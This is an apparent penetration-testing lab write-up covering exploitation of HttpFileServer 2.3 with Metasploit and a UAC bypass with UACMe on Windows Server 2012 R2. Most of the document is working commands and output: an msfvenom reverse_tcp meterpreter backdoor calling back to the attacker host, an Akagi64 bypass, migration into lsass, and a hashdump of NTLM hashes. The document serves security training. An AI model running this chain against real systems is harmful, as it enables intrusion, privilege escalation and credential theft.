Home BlogGitHubBuy Me a Book

🔬UAC Bypass

Lab 1

🔬 UAC Bypass: UACMe

  • Target IP: 10.4.19.119

  • UAC bypass

  • Some useful Win CMD commands

net user
net localgroup administrators

Enumeration

nmap 10.4.19.119
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49175/tcp open  unknown

  • Determine the version information of the web server on port 80

nmap -sV -p 80 10.4.19.119
80/tcp open  http    HttpFileServer httpd 2.3

  • The version can be checked in a browser by opening the link

    • http://10.4.19.119/

Exploitation

msfconsole -q

  • Set the target IP as GLOBAL RHOSTS variable

setg RHOSTS 10.4.19.119
search hfs
use exploit/windows/http/rejetto_hfs_exec
options
# Check other options, TARGETURI, Payload options, if necessary
exploit

  • Use meterpreter commands to gain more information about the target

getuid
	Server username: VICTIM\admin

sysinfo
    Computer       : VICTIM
    OS             : Windows 2012 R2 (6.3 Build 9600).
    Architecture   : x64
    System Language: en_US
    Domain         : WORKGROUP
    Logged On Users: 2
    Meterpreter    : x86/windows

  • Migrate current x86 meterpreter session to a x64 process

pgrep explorer
migrate 2708

  • Get admin user privileges

getprivs
    Enabled Process Privileges
    ==========================
    Name
    ----
    SeChangeNotifyPrivilege
    SeIncreaseWorkingSetPrivilege
    SeShutdownPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege

  • Verify if admin user is part of the local administrators group

shell
net user
net localgroup administrators

    Alias name   administrators
    Comment   Administrators have complete and unrestricted access to the computer/domain
    Members
    -------------------------------------------------------------------------------
    admin
    Administrator
# "admin" user is a local administrator

  • In order to run programs or tasks with elevated privileges, UAC bypass is necessary

UAC Bypass & Privesc

  • UACMe Akagi executable is already present on the attack machine

ls /root/Desktop/tools/UACME/
	Akagi64.exe

  • Generate a meterpreter payload with msfvenom

ip -br -c a
	eth1@if162568  UP  10.10.4.2/24
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.4.2 LPORT=1234 -f exe > backdoor.exe

  • Set up a new msfconsole session and set up a listener with multi/handler, to receive the connection one the payload is executed on the target

    • set the payload used with msfvenom - the windows/meterpreter/reverse_tcp one

    • set the LHOST IP and LPORT of the attack machine, based on the msfvenom generated payload

msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.4.2
set LPORT 1234
run

  • The reverse_tcp handler is listening and ready to receive the connection from the malicious payload

  • Head back in the meterpreter session already opened

cd C:\\
mkdir Temp
cd Temp
# or use
# cd C:\\Users\\admin\\AppData\\Local\\Temp

upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe

  • UAC would prevent running backdoor.exe

  • Run Akagi64.exe executable with UACMe methor 23

Akagi64.exe 23 C:\Temp\backdoor.exe

  • Elevated meterpreter session should be received on the listener

  • Migrate to a NT AUTHORITY\SYSTEM service

ps
ps -S lsass.exe
	692
migrate 692

📌 Privileges successfully elevated by bypassing UAC on a system running Windows 2012 R2.

  • Dump hashes to get the flag

hashdump

admin:1012:aad3b435b51404eeaad3b435b51404ee:4d6583ed4cef81c2f2ac3c88fc5f3da6:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:659c8124523a634e0ba68e64bb1d822f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Reveal Flag - admin NTLM Hash is: 🚩

4d6583ed4cef81c2f2ac3c88fc5f3da6

Previous🔬Win Kernel PrivescNext🔬Access Token

Last updated